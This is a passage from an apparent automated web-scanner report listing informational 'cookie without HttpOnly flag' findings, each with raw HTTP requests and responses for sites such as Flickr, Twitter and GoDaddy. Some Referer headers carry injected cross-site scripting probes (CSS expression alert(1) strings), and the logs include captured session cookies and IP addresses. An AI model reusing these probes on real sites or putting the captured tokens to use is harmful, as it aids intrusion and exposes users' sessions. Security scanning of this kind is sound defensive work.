Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=SEO000000000W&dtmc_ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&dtmc_loc=http%3A//www.register.com/
Cookie: rth=2-lpay4l-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-44~0~1~1-; uid2=499d34e38-cf7e-49f0-bcb0-ea11d282884d-gquw3zmv; T_i366=ltn%3Axc1f%3A1; T_50nu=ltn%3Axc1g%3A1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 03 Sep 2011 21:56:33 GMT
Connection: close
Set-Cookie: T_i366=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_50nu=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k5bs=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8t18=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3dqj=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gbo2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_hatf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_a6ik=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7ays=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1icy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c1h2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5mlb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bis5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6ovq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_juxr=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4f6f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_j20p=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_97h5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9n5i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gqzz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l42m=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_apfx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_56hy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7ie7=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_kr8s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_eeio=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1cyz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8s6f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5t2t=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ao1w=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jy9u=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_che1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k0ro=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_j6gc=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9qc3=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1jao=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d2cl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_35nq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f15s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_iva8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8j53=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bh8s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6ppb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gdl1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6djq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_40xg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ku6m=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_n5u=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_67pf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6nf8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8nzd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g4f5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ej8q=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f1vi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_540v=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k6pv=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jv4e=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l30v=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k9ng=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ciyg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dw7i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_fpdf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_96ti=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c72l=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_h110=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k9bd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ja6q=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cl47=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_axl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f8zj=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_afn4=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6q6i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_49e=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d73n=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e4a9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bydu=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_h5ls=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_25br=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_aoaw=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g4lf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_798a=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_drva=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7f3p=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5isr=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9dth=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dy0g=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_eylv=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_860a=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_37t9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6zdh=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6wqt=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bg5l=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3vjx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d2vl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3rgy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8oa1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e1hd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_im3g=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_efdn=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7dx8=44%3A1nxhp%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/
Set-Cookie: rth=2-lpay4l-44~1nxhp~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

11.11. http://api.flickr.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.flickr.com
Path:   /clientaccesspolicy.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: api.flickr.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 03 Sep 2011 13:08:20 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sat, 31-Aug-2013 13:08:20 GMT; path=/; domain=.flickr.com
Cache-Control: private
X-Served-By: www169.flickr.mud.yahoo.com
Vary: Accept-Encoding
Content-Length: 2211
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Flickr API: Page not found</title>
   <link href="http://l.yimg.com/g/css/c_flickr.css.v106445.18" rel="styleshe
...[SNIP]...

11.12. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline/msnewengland.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/msnewengland.json?callback=twitterCallback1&count=20&include_rts=true&cb=0.527256862920519 HTTP/1.1
Host: api.twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?%22?search=7049b%22style%3d%22x%20%3aexpression(alert(1))%20%22c711dde2c4%22
Cookie: guest_id=v1%3A131220472331773196; __utma=43838368.1381732871.1312402661.1312402661.1313158153.2; __utmz=43838368.1313158153.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=43838368.lang%3A%20en; k=50.23.123.106.1315057356690299

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 14:21:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315059715-88680-46684
X-RateLimit-Limit: 150
ETag: "d6715ce9f0c1e79626dc79a82e11136d"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 14:21:55 GMT
X-RateLimit-Remaining: 117
X-Runtime: 0.02658
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 33c5077e66a29112e5648db50c44d0bf3dfde71d
X-RateLimit-Reset: 1315062687
Set-Cookie: original_referer=OTZIBTkFw3vYp%2FBMUg4b7T4B5g%2BzzNBf74aOd5w5n3nDOQkgNed6OJLUuIobmU96yc8jAtFxZR9no3nLVaMrr1KJ4TGd50qN1EV9hxNzFVMFzbCHe5quZhHVbmpuwkjpV7ztueQSviIMnOQlXfWj0hLqdh2IsSWra2SKzXw17GNUsWwoiYAp2NEm8KSwMa38; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCNDMqi8yAToHaWQiJTEwNzljZDk3Y2JmMGI3%250AYzExYzgwZjI3MGExZGNkMjM3IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--af16b2ebca57d874237053c36043967ac7180535; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 72089
Connection: close

twitterCallback1([{"retweeted_status":{"id_str":"109776676589801472","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"C0DFEC","protected":false,"id_str":"259784927"
...[SNIP]...

11.13. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035669&c3=&c4=http%3A%2F%2Fmeetupblog.meetup.com%2F&c5=&c6=&c15=&ns__t=1315055589073&ns_c=UTF-8&c8=The%20Official%20Meetup%20HQ%20Blog&c7=http%3A%2F%2Fmeetupblog.meetup.com%2F&c9=http%3A%2F%2Fwww.meetup.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 03 Sep 2011 13:12:30 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 13:12:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.14. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnportalbetarmc&d.x=76374269&d.t=page&d.u=http%3A%2F%2Fresearch.microsoft.com%2Fapps%2Fdp%2Fsearch.aspx%3Fq%3D27b6a%2522style%25253d%2522x%2B%25253aexpression%2528alert%25281%2529%2529%2B%2522d048afd9275%26x%3D0%26y%3D0%23p%3D1%26ps%3D36%26so%3D1%26sb%3Dd%26fr%3D%26to%3D%26fd%3D%26td%3D%26rt%3D%26f%3D%26a%3D%26pn%3D27b6a%2522style%25253d%2522x%2B%25253aexpression%2528alert%25281%2529%2529%2B%2522d048afd9275%26pa&d.r=http%3A%2F%2Fresearch.microsoft.com%2Fen-us%2Fdefault.aspx HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/search.aspx?q=27b6a%22style%253d%22x+%253aexpression%28alert%281%29%29+%22d048afd9275&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 12:56:28 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 12:56:28 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.15. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=749&token=DOTM5 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Tue, 28-Aug-2012 21:33:49 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A749%3B09%2F17%2F2011%3BDOTM5; Domain=.contextweb.com; Expires=Sun, 07-Aug-2016 21:33:49 GMT; Path=/
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:33:49 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

11.16. http://c7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=305&g=20&a=149&s=1&t=r HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: FFAbh=977B305,20|149_1#365:826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:29 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFBbh=977B305,20|149_1#0:826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:29 GMT;domain=.zedo.com;path=/;
ETag: "91967049-de5c-4a8e112997f00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=29883
Expires: Sun, 04 Sep 2011 05:58:32 GMT
Date: Sat, 03 Sep 2011 21:40:29 GMT
Connection: close

GIF89a.............!.......,...........D..;



11.17. https://cart.godaddy.com/basket.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cart.godaddy.com
Path:   /basket.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /basket.aspx?app%5Fhdr= HTTP/1.1
Host: cart.godaddy.com
Connection: keep-alive
Referer: http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; domainYardVal=%2D1; serverVersion=A

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:48:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD311ef78c60812ba60cb9d86e; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault&sitename=cart.godaddy.com&page=/basket.aspx&server=M1PWCARTWEB009&status=200 OK&querystring=app_hdr=&piishown=0&shopper=46215871&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=19a7e39c-dcff-40f6-8f6d-e19d0c50259d&split=24&referringdomain=; domain=godaddy.com; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
